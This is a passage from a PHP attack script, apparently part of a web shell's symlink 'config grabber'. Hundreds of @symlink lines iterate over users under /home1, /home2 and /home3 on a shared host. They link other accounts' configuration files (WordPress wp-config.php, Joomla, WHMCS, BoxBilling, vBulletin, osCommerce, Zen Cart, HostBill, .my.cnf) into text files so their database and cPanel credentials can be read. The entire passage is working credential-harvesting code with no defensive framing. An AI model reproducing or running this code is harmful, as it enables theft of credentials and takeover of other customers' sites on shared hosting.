  1063. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1064. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1065. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1066. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1067. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1068. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1069. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1070. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1071. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1072. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1073. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1074. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1075. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1076. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1077. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1078. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1079. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1080. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1081. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1082. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1083. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1084. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1085. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1086. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1087. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1088. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1089. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1090. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1091. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1092. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1093. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1094. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1095. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1096. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1097. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1098. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1099. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1100. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1101. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1102. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1103. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1104. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1105. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1106. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1107. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1108. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1109. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1110. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1111. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1112. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1113. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1114. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1115. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1116. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1117. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1118. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1119. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1120. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1121. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1122. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1123. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1124. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1125. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1126. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1127. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1128. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1129. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1130. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1131. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1132. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1133. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1134. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1135. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1136. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1137. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1138. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1139. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1140. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1141. @symlink('/home1/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1142. @symlink('/home1/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1143. //Home2
  1144.  
  1145. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1146. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1147. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1148. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1149. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1150. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1151. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1152. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1153. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1154. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1155. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1156. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1157. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1158. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1159. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1160. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1161. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1162. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1163. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1164. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1165. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1166. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1167. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1168. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1169. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1170. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1171. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1172. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1173. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1174. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1175. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1176. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1177. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1178. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1179. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1180. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1181. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1182. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1183. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1184. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1185. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1186. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1187. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1188. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1189. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1190. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1191. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1192. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1193. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1194. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1195. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1196. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1197. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1198. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1199. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1200. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1201. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1202. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1203. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1204. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1205. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1206. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1207. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1208. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1209. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1210. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1211. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1212. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1213. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1214. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1215. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1216. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1217. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1218. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1219. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1220. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1221. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1222. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1223. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1224. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1225. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1226. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1227. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1228. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1229. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1230. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1231. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1232. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1233. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1234. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1235. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1236. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1237. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1238. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1239. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1240. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1241. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1242. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1243. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1244. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1245. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1246. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1247. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1248. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1249. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1250. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1251. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1252. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1253. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1254. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1255. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1256. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1257. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1258. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1259. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1260. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1261. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1262. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1263. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1264. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1265. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1266. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1267. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1268. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1269. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1270. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1271. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1272. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1273. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1274. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1275. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1276. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1277. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1278. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1279. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1280. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1281. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1282. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1283. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1284. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1285. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1286. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1287. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1288. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1289. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1290. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1291. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1292. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1293. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1294. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1295. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1296. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1297. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1298. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1299. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1300. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1301. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1302. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1303. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1304. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1305. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1306. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1307. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1308. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1309. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1310. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1311. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1312. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1313. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1314. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1315. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1316. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1317. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1318. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1319. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1320. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1321. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1322. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1323. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1324. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1325. @symlink('/home2/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1326. @symlink('/home2/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1327. //Home3
  1328.  
  1329. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1330. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1331. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1332. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1333. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1334. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1335. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1336. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1337. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1338. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1339. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1340. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1341. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1342. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1343. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1344. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1345. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1346. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1347. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1348. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1349. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1350. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1351. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1352. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1353. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1354. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1355. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1356. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1357. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1358. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1359. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1360. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1361. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1362. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1363. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1364. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1365. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1366. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1367. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1368. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
